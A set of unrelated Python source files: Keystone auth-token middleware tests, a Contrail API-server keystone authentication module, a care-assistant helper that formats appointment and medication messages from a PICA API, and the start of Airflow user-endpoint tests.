# under the License.
import json
import webob
import datetime
import iso8601
from keystone.middleware import auth_token
from keystone import test
# JSON responses keyed by token ID
TOKEN_RESPONSES = {
'valid-token': {
'access': {
'token': {
'id': 'valid-token',
'tenant': {
'id': 'tenant_id1',
'name': 'tenant_name1',
},
},
'user': {
'id': 'user_id1',
'name': 'user_name1',
'roles': [
{'name': 'role1'},
{'name': 'role2'},
],
},
},
},
'default-tenant-token': {
'access': {
'token': {
'id': 'default-tenant-token',
},
'user': {
'id': 'user_id1',
'name': 'user_name1',
'tenantId': 'tenant_id1',
'tenantName': 'tenant_name1',
'roles': [
{'name': 'role1'},
{'name': 'role2'},
],
},
},
},
'valid-diablo-token': {
'access': {
'token': {
'id': 'valid-diablo-token',
'tenantId': 'tenant_id1',
},
'user': {
'id': 'user_id1',
'name': 'user_name1',
'roles': [
{'name': 'role1'},
{'name': 'role2'},
],
},
},
},
'unscoped-token': {
'access': {
'token': {
'id': 'unscoped-token',
},
'user': {
'id': 'user_id1',
'name': 'user_name1',
'roles': [
{'name': 'role1'},
{'name': 'role2'},
],
},
},
}
}
class FakeMemcache(object):
def __init__(self):
self.set_key = None
self.set_value = None
self.token_expiration = None
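    # get() below mimics a cache hit for the 'valid-token' key only, returning
    # a (token_data, expiration) tuple whose expiration is a Unix-timestamp
    # string roughly five minutes in the future unless a test overrides it.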
def get(self, key):
data = TOKEN_RESPONSES['valid-token'].copy()
if not data or key != "tokens/%s" % (data['access']['token']['id']):
return
if not self.token_expiration:
dt = datetime.datetime.now() + datetime.timedelta(minutes=5)
self.token_expiration = dt.strftime("%s")
dt = datetime.datetime.now() + datetime.timedelta(hours=24)
ks_expires = dt.isoformat()
data['access']['token']['expires'] = ks_expires
return (data, str(self.token_expiration))
def set(self, key, value, time=None):
self.set_value = value
self.set_key = key
class FakeHTTPResponse(object):
def __init__(self, status, body):
self.status = status
self.body = body
def read(self):
return self.body
class FakeHTTPConnection(object):
def __init__(self, *args):
pass
def request(self, method, path, **kwargs):
"""Fakes out several http responses.
If a POST request is made, we assume the calling code is trying
to get a new admin token.
        If a GET request is made to validate a token, return success
        if the token ID is one of the keys in TOKEN_RESPONSES. Otherwise,
        return a 404, indicating an unknown (therefore unauthorized) token.
"""
if method == 'POST':
status = 200
body = json.dumps({
'access': {
'token': {'id': 'admin_token2'},
},
})
else:
token_id = path.rsplit('/', 1)[1]
if token_id in TOKEN_RESPONSES.keys():
status = 200
body = json.dumps(TOKEN_RESPONSES[token_id])
else:
status = 404
body = str()
self.resp = FakeHTTPResponse(status, body)
def getresponse(self):
return self.resp
def close(self):
pass
class FakeApp(object):
"""This represents a WSGI app protected by the auth_token middleware."""
def __init__(self, expected_env=None):
expected_env = expected_env or {}
self.expected_env = {
'HTTP_X_IDENTITY_STATUS': 'Confirmed',
'HTTP_X_TENANT_ID': 'tenant_id1',
'HTTP_X_TENANT_NAME': 'tenant_name1',
'HTTP_X_USER_ID': 'user_id1',
'HTTP_X_USER_NAME': 'user_name1',
'HTTP_X_ROLES': 'role1,role2',
'HTTP_X_USER': 'user_name1', # deprecated (diablo-compat)
'HTTP_X_TENANT': 'tenant_name1', # deprecated (diablo-compat)
'HTTP_X_ROLE': 'role1,role2', # deprecated (diablo-compat)
}
self.expected_env.update(expected_env)
def __call__(self, env, start_response):
for k, v in self.expected_env.items():
assert env[k] == v, '%s != %s' % (env[k], v)
resp = webob.Response()
resp.body = 'SUCCESS'
return resp(env, start_response)
class BaseAuthTokenMiddlewareTest(test.TestCase):
def setUp(self, expected_env=None):
expected_env = expected_env or {}
conf = {
'admin_token': 'admin_token1',
'auth_host': 'keystone.example.com',
'auth_port': 1234,
}
self.middleware = auth_token.AuthProtocol(FakeApp(expected_env), conf)
self.middleware.http_client_class = FakeHTTPConnection
self.middleware._iso8601 = iso8601
self.response_status = None
self.response_headers = None
super(BaseAuthTokenMiddlewareTest, self).setUp()
def start_fake_response(self, status, headers):
self.response_status = int(status.split(' ', 1)[0])
self.response_headers = dict(headers)
class DiabloAuthTokenMiddlewareTest(BaseAuthTokenMiddlewareTest):
"""Auth Token middleware should understand Diablo keystone responses."""
def setUp(self):
# pre-diablo only had Tenant ID, which was also the Name
expected_env = {
'HTTP_X_TENANT_ID': 'tenant_id1',
'HTTP_X_TENANT_NAME': 'tenant_id1',
'HTTP_X_TENANT': 'tenant_id1', # now deprecated (diablo-compat)
}
super(DiabloAuthTokenMiddlewareTest, self).setUp(expected_env)
def test_diablo_response(self):
req = webob.Request.blank('/')
req.headers['X-Auth-Token'] = 'valid-diablo-token'
body = self.middleware(req.environ, self.start_fake_response)
self.assertEqual(self.response_status, 200)
self.assertEqual(body, ['SUCCESS'])
class AuthTokenMiddlewareTest(BaseAuthTokenMiddlewareTest):
def test_valid_request(self):
req = webob.Request.blank('/')
req.headers['X-Auth-Token'] = 'valid-token'
body = self.middleware(req.environ, self.start_fake_response)
self.assertEqual(self.response_status, 200)
self.assertEqual(body, ['SUCCESS'])
def test_default_tenant_token(self):
"""Unscoped requests with a default tenant should "auto-scope."
The implied scope is the user's tenant ID.
"""
req = webob.Request.blank('/')
req.headers['X-Auth-Token'] = 'default-tenant-token'
body = self.middleware(req.environ, self.start_fake_response)
self.assertEqual(self.response_status, 200)
self.assertEqual(body, ['SUCCESS'])
def test_unscoped_token(self):
"""Unscoped requests with no default tenant ID should be rejected."""
req = webob.Request.blank('/')
req.headers['X-Auth-Token'] = 'unscoped-token'
self.middleware(req.environ, self.start_fake_response)
self.assertEqual(self.response_status, 401)
self.assertEqual(self.response_headers['WWW-Authenticate'],
'Keystone uri=\'https://keystone.example.com:1234\'')
def test_request_invalid_token(self):
req = webob.Request.blank('/')
req.headers['X-Auth-Token'] = 'invalid-token'
self.middleware(req.environ, self.start_fake_response)
self.assertEqual(self.response_status, 401)
self.assertEqual(self.response_headers['WWW-Authenticate'],
'Keystone uri=\'https://keystone.example.com:1234\'')
def test_request_no_token(self):
req = webob.Request.blank('/')
self.middleware(req.environ, self.start_fake_response)
self.assertEqual(self.response_status, 401)
self.assertEqual(self.response_headers['WWW-Authenticate'],
'Keystone uri=\'https://keystone.example.com:1234\'')
def test_request_blank_token(self):
req = webob.Request.blank('/')
req.headers['X-Auth-Token'] = ''
self.middleware(req.environ, self.start_fake_response)
self.assertEqual(self.response_status, 401)
self.assertEqual(self.response_headers['WWW-Authenticate'],
'Keystone uri=\'https://keystone.example.com:1234\'')
def test_memcache(self):
req = webob.Request.blank('/')
req.headers['X-Auth-Token'] = 'valid-token'
self.middleware._cache = FakeMemcache()
self.middleware(req.environ, self.start_fake_response)
self.assertEqual(self.middleware._cache.set_value, None)
def test_memcache_set_invalid(self):
req = webob.Request.blank('/')
req.headers['X-Auth-Token'] = 'invalid-token'
self.middleware._cache = FakeMemcache()
self.middleware(req.environ, self.start_fake_response)
self.assertEqual(self.middleware._cache.set_value, "invalid")
def test_memcache_set_expired(self):
req = webob.Request.blank('/')
req.headers['X-Auth-Token'] = 'valid-token'
self.middleware._cache = FakeMemcache()
expired = datetime.datetime.now() - datetime.timedelta(minutes=1)
self.middleware._cache.token_expiration = float(expired.strftime("%s"))
self.middleware(req.environ, self.start_fake_response)
self.assertEqual(len(self.middleware._cache.set_value), 2)
if __name__ == '__main__':
import unittest
unittest.main()
|
|
#
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
#
# This file contains authentication/authorization functionality for VNC-CFG
# subsystem. It also currently contains keystone adaptation which can in
# future be moved to vnc_auth_keystone.py
#
import gevent
from gevent import monkey
monkey.patch_all()
import ConfigParser
import bottle
import time
import base64
import re
try:
from keystoneclient.middleware import auth_token
except ImportError:
try:
from keystonemiddleware import auth_token
except ImportError:
pass
from pysandesh.gen_py.sandesh.ttypes import SandeshLevel
from vnc_bottle import get_bottle_server
from cfgm_common import utils as cfgmutils
from cfgm_common import vnc_greenlets
from context import get_request, get_context, set_context, use_context
from context import ApiContext, ApiInternalRequest
#keystone SSL cert bundle
_DEFAULT_KS_CERT_BUNDLE="/tmp/keystonecertbundle.pem"
_DEFAULT_KS_VERSION = "v2.0"
# Open port for access to API server for troubleshooting
class LocalAuth(object):
def __init__(self, app, conf_info):
self._http_host = 'localhost'
self._http_port = conf_info['admin_port']
self._http_app = bottle.Bottle()
self._http_app.merge(app.routes)
self._http_app.config.local_auth = True
self._http_app.error_handler = app.error_handler
self._conf_info = conf_info
# Two decorators below due to a change in API between bottle 0.11.6
# (which insists on the global app) and later versions (which need the
# decorator on the specific app)
@self._http_app.hook('before_request')
@bottle.hook('before_request')
def local_auth_check(*args, **kwargs):
if bottle.request.app != self._http_app:
return
# expect header to have something like 'Basic YWJjOmRlZg=='
auth_hdr_val = bottle.request.environ.get('HTTP_AUTHORIZATION')
if not auth_hdr_val:
bottle.abort(401, 'HTTP_AUTHORIZATION header missing')
try:
auth_type, user_passwd = auth_hdr_val.split()
except Exception as e:
bottle.abort(401, 'Auth Exception: %s' %(str(e)))
user_passwd = base64.b64decode(user_passwd)
user, passwd = user_passwd.split(':')
admin_user = self._conf_info.get('admin_user',
self._conf_info.get('username'))
admin_password = self._conf_info.get('admin_password',
self._conf_info.get('password'))
if admin_user != user or admin_password != passwd:
bottle.abort(401, 'Authentication check failed')
# Add admin role to the request
bottle.request.environ['HTTP_X_ROLE'] = 'admin'
# end __init__
def start_http_server(self):
self._http_app.run(
host=self._http_host, port=self._http_port,
server=get_bottle_server(self._conf_info.get('max_requests')))
# end start_http_server
# end class LocalAuth
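# Illustrative sketch (not part of the original module): the kind of request the
# LocalAuth loopback admin port expects, i.e. an HTTP Basic 'Authorization' header
# such as 'Basic YWJjOmRlZg=='. Host, port and credentials below are placeholders
# and the 'requests' library is assumed to be available; this helper is never
# called anywhere in this module.
def _example_local_auth_request(admin_port, user, passwd):
    import requests
    creds = base64.b64encode(('%s:%s' % (user, passwd)).encode('utf-8')).decode('ascii')
    return requests.get('http://localhost:%s/' % admin_port,
                        headers={'Authorization': 'Basic %s' % creds})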
# Pre-auth filter
class AuthPreKeystone(object):
def __init__(self, app, conf, server_mgr):
self.app = app
self.conf = conf
self.server_mgr = server_mgr
def path_in_white_list(self, path):
for pattern in self.server_mgr.white_list:
if re.search(pattern, path):
return True
return False
@use_context
def __call__(self, env, start_response):
if self.path_in_white_list(env['PATH_INFO']):
# permit access to white list without requiring a token
env['HTTP_X_ROLE'] = ''
app = self.server_mgr.api_bottle
elif self.server_mgr.is_auth_needed():
app = self.app
else:
app = self.server_mgr.api_bottle
get_context().set_proc_time('PRE_KEYSTONE_REQ')
return app(env, start_response)
# Post-auth filter. Normalize user/role supplied by quantum plugin for
# consumption by Perms
class AuthPostKeystone(object):
def __init__(self, app, conf):
self.app = app
self.conf = conf
def __call__(self, env, start_response):
get_context().set_proc_time('POST_KEYSTONE_REQ')
# if rbac is set, skip old admin based MT
if self.conf['auth_svc']._mt_rbac:
return self.app(env, start_response)
# only allow admin access when MT is on
roles = []
if 'HTTP_X_ROLE' in env:
roles = env['HTTP_X_ROLE'].split(',')
if 'admin' not in [x.lower() for x in roles]:
start_response('403 Permission Denied',
[('Content-type', 'text/plain')])
return ['403 Permission Denied']
return self.app(env, start_response)
class AuthServiceKeystone(object):
def __init__(self, server_mgr, args):
self.args = args
_kscertbundle=''
if args.auth_protocol == 'https' and args.cafile:
certs=[args.cafile]
if args.keyfile and args.certfile:
certs=[args.certfile, args.keyfile, args.cafile]
_kscertbundle=cfgmutils.getCertKeyCaBundle(_DEFAULT_KS_CERT_BUNDLE,certs)
self._conf_info = {
'admin_port': args.admin_port,
'max_requests': args.max_requests,
'region_name': args.region_name,
'insecure': args.insecure,
}
if args.auth_url:
auth_url = args.auth_url
else:
auth_url = '%s://%s:%s/%s' % (
args.auth_protocol, args.auth_host, args.auth_port,
_DEFAULT_KS_VERSION)
if 'v2.0' in auth_url.split('/'):
identity_uri = '%s://%s:%s' % (
args.auth_protocol, args.auth_host, args.auth_port)
self._conf_info.update({
'auth_host': args.auth_host,
'auth_port': args.auth_port,
'auth_protocol': args.auth_protocol,
'admin_user': args.admin_user,
'admin_password': args.admin_password,
'admin_tenant_name': args.admin_tenant_name,
'identity_uri': identity_uri})
else:
self._conf_info.update({
'auth_type': args.auth_type,
'auth_url': auth_url,
'username': args.admin_user,
'password': args.admin_password,
})
# Add user domain info
self._conf_info.update(**cfgmutils.get_user_domain_kwargs(args))
# Get project scope auth params
scope_kwargs = cfgmutils.get_project_scope_kwargs(args)
if not scope_kwargs:
# Default to domain scoped auth
scope_kwargs = cfgmutils.get_domain_scope_kwargs(args)
self._conf_info.update(**scope_kwargs)
if _kscertbundle:
self._conf_info['cafile'] = _kscertbundle
self._server_mgr = server_mgr
self._auth_method = args.auth
self._auth_middleware = None
self._mt_rbac = server_mgr.is_rbac_enabled()
self._auth_needed = server_mgr.is_auth_needed()
if not self._auth_method:
return
if self._auth_method != 'keystone':
raise UnknownAuthMethod()
# map keystone id to users. Needed for the quantum plugin because the contrail
# plugin doesn't have access to the user token and ends up sending the admin
# token along with the user-id and role
self._ks_users = {}
# configure memcache if enabled
if self._auth_needed and 'memcache_servers' in args:
self._conf_info[
'memcached_servers'] = args.memcache_servers.split(',')
if 'token_cache_time' in args:
self._conf_info['token_cache_time'] = args.token_cache_time
self._user_auth_middleware = None
self._hdr_from_token_auth_middleware = None
# end __init__
def get_middleware_app(self):
if not self._auth_method:
return None
if not self._auth_needed:
return None
# keystone middleware is needed for fetching objects
app = AuthPostKeystone(self._server_mgr.api_bottle, {'auth_svc': self})
auth_middleware = auth_token.AuthProtocol(app, self._conf_info)
self._auth_middleware = auth_middleware
# open access for troubleshooting
admin_port = self._conf_info['admin_port']
self._local_auth_app = LocalAuth(self._server_mgr.api_bottle,
self._conf_info)
vnc_greenlets.VncGreenlet("VNC Auth Keystone",
self._local_auth_app.start_http_server)
app = AuthPreKeystone(auth_middleware, None, self._server_mgr)
return app
# end get_middleware_app
def verify_signed_token(self, user_token):
try:
return self._auth_middleware.verify_signed_token(user_token)
except Exception:
# Retry verify after fetching the certs.
try:
self._auth_middleware.fetch_signing_cert()
self._auth_middleware.fetch_ca_cert()
return self._auth_middleware.verify_signed_token(user_token)
except Exception:
return None
# end
# gets called from keystone middleware after token check
def token_valid(self, env, start_response):
status = env.get('HTTP_X_IDENTITY_STATUS')
token_info = env.get('keystone.token_info')
start_response('200 OK', [('Content-type', 'text/plain')])
return token_info if status != 'Invalid' else ''
def start_response(self, status, headers, exc_info=None):
pass
def validate_user_token(self):
if not self._user_auth_middleware:
# the following config forces the keystone middleware to always return
# the result in the HTTP_X_IDENTITY_STATUS env variable
conf_info = self._conf_info.copy()
conf_info['delay_auth_decision'] = True
self._user_auth_middleware = auth_token.AuthProtocol(
self.token_valid, conf_info)
if not self._user_auth_middleware:
return False, (403, "Permission denied")
request_attrs = {
'REQUEST_METHOD': get_request().route.method,
'bottle.app': get_request().environ['bottle.app'],
}
if 'HTTP_X_AUTH_TOKEN' in get_request().environ:
request_attrs['HTTP_X_AUTH_TOKEN'] =\
get_request().environ['HTTP_X_AUTH_TOKEN'].encode("ascii")
elif 'HTTP_X_USER_TOKEN' in get_request().environ:
request_attrs['HTTP_X_USER_TOKEN'] =\
get_request().environ['HTTP_X_USER_TOKEN'].encode("ascii")
else:
return False, (400, "User token needed for validation")
b_req = bottle.BaseRequest(request_attrs)
# get permissions in internal context
orig_context = get_context()
i_req = ApiInternalRequest(b_req.url, b_req.urlparts, b_req.environ,
b_req.headers, None, None)
set_context(ApiContext(internal_req=i_req))
try:
token_info = self._user_auth_middleware(
get_request().headers.environ, self.start_response)
finally:
set_context(orig_context)
return True, token_info
def get_auth_headers_from_token(self, request, token):
if not self._hdr_from_token_auth_middleware:
conf_info = self._conf_info.copy()
conf_info['delay_auth_decision'] = True
def token_to_headers(env, start_response):
start_response('200 OK', [('Content-type', 'text/plain')])
status = env.get('HTTP_X_IDENTITY_STATUS')
if status and status.lower() == 'invalid':
return {}
ret_headers_dict = {}
for hdr_name in ['HTTP_X_DOMAIN_ID', 'HTTP_X_PROJECT_ID',
'HTTP_X_PROJECT_NAME', 'HTTP_X_USER', 'HTTP_X_ROLE',
'HTTP_X_API_ROLE']:
hdr_val = env.get(hdr_name)
if hdr_val:
ret_headers_dict[hdr_name] = hdr_val
return ret_headers_dict
self._hdr_from_token_auth_middleware = auth_token.AuthProtocol(
token_to_headers, conf_info)
return self._hdr_from_token_auth_middleware(
request.headers.environ, self.start_response)
# end get_auth_headers_from_token
# end class AuthServiceKeystone
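# Illustrative sketch (not part of the original module): the delay_auth_decision
# pattern used by validate_user_token() and get_auth_headers_from_token() above.
# With 'delay_auth_decision' set, the keystone middleware does not reject requests
# itself; it annotates the WSGI environ (e.g. HTTP_X_IDENTITY_STATUS, HTTP_X_USER)
# and leaves the decision to the inner app. The conf_info keys mirror
# self._conf_info; this helper is for illustration only and is never called here.
def _example_delayed_auth_pipeline(conf_info):
    def inner_app(env, start_response):
        start_response('200 OK', [('Content-type', 'text/plain')])
        if env.get('HTTP_X_IDENTITY_STATUS') == 'Invalid':
            return ['token rejected']
        return ['authenticated as %s' % env.get('HTTP_X_USER', 'unknown')]
    conf = dict(conf_info, delay_auth_decision=True)
    return auth_token.AuthProtocol(inner_app, conf)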
|
|
# import sqlite3
# import iso8601
import logging
import os
import requests
rootLogger = logging.getLogger(__name__)
pica_url = os.environ.get('pica_url')
def get_appointment_msg(msg_info,time_frame):
rootLogger.info('Getting Appointments')
'''
if not msg_info["Device ID"]: #test database
param = { 'db_name': 'devdb',
'table_name': 'appointment',
'time_frame': time_frame,
'user_id': 'user1'
}
'''
# else: #setup dict for sending to api
param = { 'db_name': 'appt',
'time_frame': time_frame,
'user_id': msg_info["Device ID"]
}
# [{'date': '2017-12-04T00:00:00.000Z', 'time': '12:00nn', 'service_type': 'Meal Service',
# 'assigned_careworker': '####'}]
#rootLogger.info(timeframe)
appointmentslist, status = get_info_from_PICA(param)
if status=='success':
if appointmentslist:
appointmentslist = [x for x in appointmentslist if x is not None] # handling weird occasional null output from pica
numappointments = len(appointmentslist)
appointment_msglist = []
if numappointments > 1:
appointment_msglist.append('You have, {}, events. '.format(numappointments))
else:
appointment_msglist.append('You have, 1, event. ')
prev_date = ''
prev_time = ''
for idx, appointment in enumerate(appointmentslist):
if appointment['service_type']=='Activities - indoor': #handle activities
if numappointments > 1:
appointment_msglist.append('. Activity, {}: . '.format(idx + 1))
# Midday meal (service type) will arrive at date/time and be provided by Careworker Name (appointed_person)
if appointment['name']:
appointment_msglist.append(appointment['name'])
if appointment['date'] and not prev_date == appointment['date']:
appointment_msglist.append('on ' + appointment['date'][
0:10] + ',') # poor implementation! to revisit once PICA figures out what they have
prev_date = appointment['date']
if appointment['time'] and not prev_time == appointment['time']:
prev_time = appointment['time']
if 'nn' in appointment['time']:
appointment_msglist.append(' at ' + appointment['time'][
0:2] + ' noon. ') # poor implementation! to revisit once PICA figures out what they have
else:
appointment_msglist.append(' at ' + appointment['time'] + '. ')
if appointment['appointed_person']:
appointment_msglist.append('and be provided by ' + appointment['appointed_person'] + '.')
elif appointment['location']=='home': # handle in-house appointment
# Midday meal (service type) will arrive at date/time and be provided by Careworker Name (appointed_person)
if numappointments > 1:
appointment_msglist.append('. Appointment, {}: . '.format(idx + 1))
if appointment['name']:
appointment_msglist.append(appointment['name'] + ' will arrive at')
if appointment['date'] and not prev_date == appointment['date']:
appointment_msglist.append(appointment['date'][0:10] + ',') #poor implementation! to revisit once PICA figures out what they have
prev_date = appointment['date']
if appointment['time'] and not prev_time == appointment['time']:
prev_time = appointment['time']
if 'nn' in appointment['time']:
appointment_msglist.append(appointment['time'][0:2]+' noon.') #poor implementation! to revisit once PICA figures out what they have
else:
appointment_msglist.append(appointment['time'] + '. ')
if appointment['appointed_person']:
appointment_msglist.append('and be provided by ' + appointment['appointed_person'] + '.')
else: # handle out-house appointment
# (service_type) on date/time, at (location)
if numappointments > 1:
appointment_msglist.append('. Appointment, {}: . '.format(idx + 1))
if appointment['name']:
appointment_msglist.append(appointment['name'])
if appointment['date'] and not prev_date == appointment['date']:
appointment_msglist.append('on ' + appointment['date'][0:10] + ',') #poor implementation! to revisit once PICA figures out what they have
prev_date = appointment['date']
if appointment['time'] and not prev_time == appointment['time']:
prev_time = appointment['time']
if 'nn' in appointment['time']:
appointment_msglist.append(appointment['time'][0:2]+' noon.') #poor implementation! to revisit once PICA figures out what they have
else:
appointment_msglist.append(appointment['time'] + '. ')
if appointment['location']:
appointment_msglist.append('at ' + appointment['location'] + '.')
appointment_msg = ', '.join(appointment_msglist)
else:
appointment_msg = 'You have no appointments.'
elif status == 'Connection Error':
#appointment_msg = "You have 1 appointment. Dental Checkup. On: Sat, 13 Jan 2018, 2:10 PM. With: Dr Chin at: TTSH. "
appointment_msg = "Sorry we are experiencing technical difficulties retrieving data. Please check back later."
rootLogger.error('PICA connection Error')
elif status == 'Connection Timeout':
#appointment_msg = "You have 1 appointment. Dental Checkup. On: Sat, 13 Jan 2018, 2:10 PM. With: Dr Chin at: TTSH. "
appointment_msg = "Sorry we are experiencing technical difficulties retrieving data. Please check back later."
rootLogger.error('PICA connection Timeout')
else:
appointment_msg = 'Error in Appointment function'
# appointment_msg='Your current schedules are {}'.format(appointment_msgstr)
rootLogger.info("Get Appointment complete")
rootLogger.debug(appointment_msg)
return appointment_msg, status
def get_medication_msg(msg_info,time_frame):
rootLogger.info('Getting Medication')
'''
if not msg_info["Device ID"]:
param = { 'db_name': 'devdb',
'table_name': 'medication',
'time_frame': time_frame,
'user_id': 'user1'
}
'''
#else:
param = { 'db_name': 'meds',
'time_frame': time_frame,
'user_id': msg_info["Device ID"]
}
medicationlist, status = get_info_from_PICA(param)
if status == 'success':
if medicationlist:
medicationlist = [x for x in medicationlist if x is not None] #handling weird occasional null output from pica
nummedication = len(medicationlist)
medication_msglist = []
if nummedication > 1:
medication_msglist.append('You have {} medications. '.format(nummedication))
else:
medication_msglist.append('You have 1 medication. ')
prev_date=''
prev_time = ''
for idx, medication in enumerate(medicationlist):
if nummedication > 1:
medication_msglist.append('. Medication {}:'.format(idx + 1) + '. ')
if medication['date'] and not prev_date == medication['date']: #group similar dates together
medication_msglist.append('On ' + medication['date'][0:10] + ',') #poor implementation! to revisit once PICA figures out what they have
prev_date = medication['date']
if medication['time'] and not prev_time == medication['time']: #group similar times together <- may have error if spans multiple days
prev_time = medication['time']
if 'nn' in medication['time']:
medication_msglist.append('at ' + medication['time'][0:2]+' noon') #poor implementation! to revisit once PICA figures out what they have
else:
medication_msglist.append('at ' + medication['time'])
if medication['medications']:
for med in medication['medications']:
medication_msglist.append(med + ', ')
medication_msg = ', '.join(medication_msglist)
else:
medication_msg = 'You have no medication to take.'
elif status == 'Connection Error':
#medication_msg = "You have 2 medications to take. Medication 1:. 1 tablet Panadol after meal. do not eat before meal. Medication 2:. 2 tablets Lasix at 03:10 PM."
medication_msg = "Sorry we are experiencing technical difficulties retrieving data. Please check back later."
rootLogger.error('PICA connection Error')
elif status == 'Connection Timeout':
#medication_msg = "You have 2 medications to take. Medication 1:. 1 tablet Panadol after meal. do not eat before meal. Medication 2:. 2 tablets Lasix at 03:10 PM."
medication_msg = "Sorry we are experiencing technical difficulties retrieving data. Please check back later."
rootLogger.error('PICA connection Timeout')
else:
medication_msg = 'Error in Medication function'
#medication_msg = "You have 2 medications to take. Medication 1:. 1 tablet Panadol after meal. do not eat before meal. Medication 2:. 2 tablets Lasix at 03:10 PM."
rootLogger.info("Get medication complete")
rootLogger.debug(medication_msg)
return medication_msg, status
def get_food_msg(msg_info,time_frame):
rootLogger.info('Getting Food')
'''
if not msg_info["Device ID"]:
param = { 'db_name': 'devdb',
'table_name': 'food',
'time_frame': time_frame,
'user_id': 'user1'
}
'''
param = { 'db_name': 'food',
'time_frame': time_frame,
'user_id': msg_info["Device ID"]
}
foodlist, status = get_info_from_PICA(param)
if status == 'success':
if foodlist:
food_msglist = []
food_msglist.append('Please eat')
food_msglist2 = []
for idx, food in enumerate(foodlist):
if food['foodtype']:
food_msglist2.append(food['foodtype'])
if food['frequency']:
food_msglist2.append(food['frequency'])
food_msglist.append(' '.join(food_msglist2))
else:
food_msglist = ['Eat whatever you like.']  # keep this a list so the join below works
# appointment_msg='Your current schedules are {}'.format(appointment_msgstr)
food_msg = ' '.join(food_msglist)
elif status == 'Connection Error':
food_msg = 'PICA food API is down'
elif status == 'Connection Timeout':
food_msg = "PICA Appointment API Timed out. " \
"Please eat Breakfast everyday"
else:
food_msg = 'Error in food function'
#food_msg = "If you are not very hungry, you can have hot milo or porridge"
rootLogger.info('Get food complete')
rootLogger.debug(food_msg)
return food_msg, status
def get_help_msg(msg_info):
rootLogger.info('Getting help')
#contact requested resource.
source_msg = 'PICA'
status = push_info_to_PICA(source_msg, msg_info["Request Timestamp"])
if status:
help_msg = ' '.join(['Contacted', source_msg, 'for help'])
rootLogger.info('Get help complete')
status = 'success'
else:
help_msg = 'Send help API is down'
status = 'Connection Timeout'
#help_msg = 'Okay, Help is on its way'
#do follow up action like send sms instead.
rootLogger.info('Get help failed')
rootLogger.debug(help_msg)
return help_msg, status
def get_info_from_PICA(param):
# retrieve data from PICA
# build object to be sent. redundant?
# data_to_send = { 'Alexa_id' : param['user_id'],
# 'date_range' : param['time_frame']
# }
#url = '/'.join([pica_url,param['db_name'], param['time_frame']['date_start'], param['time_frame']['date_end'], param['user_id']])
url = '/'.join([pica_url,param['db_name']])
data_to_send = {'alexa_id': param['user_id'],
'startDate' : param['time_frame']['date_start'],
'endDate': param['time_frame']['date_end']}
#rootLogger.debug(url)
# Send request to PICA
# try:
# r = requests.post('http://httpbin.org/post', data = {'key':'value'})
try:
# pica_response = requests.get(url, timeout=2)
pica_response = requests.get(url, params=data_to_send, timeout=2)
pica_response.raise_for_status()
except requests.exceptions.HTTPError as e:
status = str(e)
data_retrieved = ''
rootLogger.debug(e)
except requests.exceptions.ConnectionError as e:
rootLogger.debug("Error Connecting:")
status = 'Connection Error'
data_retrieved = ''
except requests.exceptions.Timeout as e:
rootLogger.debug("Timeout Error:" )
status = 'Connection Timeout'
data_retrieved = ''
except requests.exceptions.RequestException as e:
# catastrophic error. bail.
data_retrieved = ''
status = 'Unknown error'
rootLogger.debug(e)
else:
data_retrieved = pica_response.json()
status = 'success'
# parse return data from PICA
# iso8601.parse_date()
# time of the appointment
# type of service (e.g. meal service)
# assigned healthcare worker
# comments (this is optional e.g. assigned careworker will be running late)
# data_recieved = r.json()
return data_retrieved, status
def push_info_to_PICA(source, param):
# Send request to PICA
# r = requests.post('http://httpbin.org/post', data = {'key':'value'})
# r = RQ.post(url, json = data_to_send)
# parse return data from PICA
# assigned healthcare worker
# comments (this is optional e.g. assigned careworker will be running late)
# data_recieved = r.json()
#data_recieved = data_to_send
status = False
return status
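# Illustrative sketch (not part of the original module): the input shapes the helpers
# above expect. All values are placeholders; get_appointment_msg() ultimately issues a
# real HTTP GET against pica_url, so this helper is defined but never called here.
def _example_appointment_query():
    msg_info = {"Device ID": "user1", "Request Timestamp": "2018-01-13T14:10:00"}
    time_frame = {"date_start": "2018-01-13", "date_end": "2018-01-14"}
    return get_appointment_msg(msg_info, time_frame)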
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest.mock
import pytest
from flask_appbuilder.security.sqla.models import User
from parameterized import parameterized
from sqlalchemy.sql.functions import count
from airflow.api_connexion.exceptions import EXCEPTIONS_LINK_MAP
from airflow.security import permissions
from airflow.utils import timezone
from airflow.utils.session import create_session
from tests.test_utils.api_connexion_utils import assert_401, create_user, delete_user
from tests.test_utils.config import conf_vars
DEFAULT_TIME = "2020-06-11T18:00:00+00:00"
@pytest.fixture(scope="module")
def configured_app(minimal_app_for_api):
app = minimal_app_for_api
create_user(
app, # type: ignore
username="test",
role_name="Test",
permissions=[
(permissions.ACTION_CAN_CREATE, permissions.RESOURCE_USER),
(permissions.ACTION_CAN_DELETE, permissions.RESOURCE_USER),
(permissions.ACTION_CAN_EDIT, permissions.RESOURCE_USER),
(permissions.ACTION_CAN_READ, permissions.RESOURCE_USER),
],
)
create_user(app, username="test_no_permissions", role_name="TestNoPermissions") # type: ignore
yield app
delete_user(app, username="test") # type: ignore
delete_user(app, username="test_no_permissions") # type: ignore
class TestUserEndpoint:
@pytest.fixture(autouse=True)
def setup_attrs(self, configured_app) -> None:
self.app = configured_app
self.client = self.app.test_client() # type:ignore
self.session = self.app.appbuilder.get_session
def teardown_method(self) -> None:
# Delete users that have our custom default time
users = self.session.query(User).filter(User.changed_on == timezone.parse(DEFAULT_TIME))
users.delete(synchronize_session=False)
self.session.commit()
def _create_users(self, count, roles=None):
# create users with defined created_on and changed_on date
# for easy testing
if roles is None:
roles = []
return [
User(
first_name=f'test{i}',
last_name=f'test{i}',
username=f'TEST_USER{i}',
email=f'mytest@test{i}.org',
roles=roles or [],
created_on=timezone.parse(DEFAULT_TIME),
changed_on=timezone.parse(DEFAULT_TIME),
)
for i in range(1, count + 1)
]
class TestGetUser(TestUserEndpoint):
def test_should_respond_200(self):
users = self._create_users(1)
self.session.add_all(users)
self.session.commit()
response = self.client.get("/api/v1/users/TEST_USER1", environ_overrides={'REMOTE_USER': "test"})
assert response.status_code == 200
assert response.json == {
'active': None,
